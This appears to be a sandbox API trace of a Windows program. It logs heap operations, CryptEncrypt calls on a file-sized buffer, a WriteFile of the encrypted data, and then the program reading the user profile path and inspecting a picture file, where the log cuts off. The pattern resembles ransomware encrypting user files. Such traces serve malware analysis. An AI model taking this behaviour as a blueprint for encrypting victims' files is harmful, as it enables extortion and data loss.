RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0208.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0208.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0208.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0208.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0208.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0208.845] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0208.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74670 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0208.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0208.846] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0208.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0208.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0208.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74670 | out: hHeap=0x2af0000) returned 1 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0208.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0208.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0208.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0208.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0208.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0208.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0208.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0208.848] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0208.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0208.848] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe058 | out: hHeap=0x2af0000) returned 1 [0208.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.851] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0208.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0208.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab3e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.852] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x7be6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x7be8) returned 1 [0208.852] CharLowerBuffW (in: lpsz="byte[31720]", cchLength=0xb | out: lpsz="byte[31720]") returned 0xb [0208.853] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.853] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0208.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab2a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0208.853] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2abe058*, pdwDataLen=0x8cef60*=0x7be6, dwBufLen=0x7be8 | out: pbData=0x2abe058*, pdwDataLen=0x8cef60*=0x7be8) returned 1 [0208.854] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.854] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.854] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.854] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.854] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.854] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.861] WriteFile (in: hFile=0x524, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x7be8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x7be8, lpOverlapped=0x0) returned 1 [0208.863] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0208.863] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0208.863] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.863] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaee8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0208.863] CryptDestroyKey (hKey=0x9e1bf8) returned 1 [0208.863] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.863] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.863] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.863] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.863] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.863] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.863] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0208.864] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0208.864] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0208.864] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0208.864] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.864] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.864] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.864] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.864] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.864] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.864] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0208.864] CryptReleaseContext (hProv=0xa7c110, dwFlags=0x0) returned 1 [0208.864] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.864] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.864] FreeLibrary (hLibModule=0x76390000) returned 1 [0208.864] CloseHandle (hObject=0x510) returned 1 [0208.865] CloseHandle (hObject=0x524) returned 1 [0208.867] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.867] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.868] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/6MclNK.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\6MclNK.gif", lpFilePart=0x8cedf4*="6MclNK.gif") returned 0x23 [0208.868] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\6MclNK.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\6mclnk.gif")) returned 0x20 [0208.868] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\6MclNK.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4110030, ftCreationTime.dwHighDateTime=0x1d5d29b, ftLastAccessTime.dwLowDateTime=0x165d7400, 